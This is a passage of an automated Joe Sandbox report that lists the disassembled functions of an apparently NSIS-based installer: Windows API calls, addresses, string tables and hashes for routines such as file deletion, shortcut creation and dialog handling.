                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                                    • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                                    • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                                    • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                                                    • Opcode ID: 60dec75628f9769c23c01a777027d1821986551530c1d832e54061f08b3160b2
                                                                                                                                                                                                                                                                                                    • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60dec75628f9769c23c01a777027d1821986551530c1d832e54061f08b3160b2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                                    • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                                    • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                                    • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                                    • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                                    • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                                                    • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                                                    • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                                    • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                                    • String ID: F$A
                                                                                                                                                                                                                                                                                                    • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9d23a5a8c0223ae690e18e5715e7d3cdc314298ad832e99d2ae59d35dee8c45f
                                                                                                                                                                                                                                                                                                    • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d23a5a8c0223ae690e18e5715e7d3cdc314298ad832e99d2ae59d35dee8c45f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                                    • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateInstance
                                                                                                                                                                                                                                                                                                    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                                    • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                                                    • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                                    • String ID: F$N$open
                                                                                                                                                                                                                                                                                                    • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
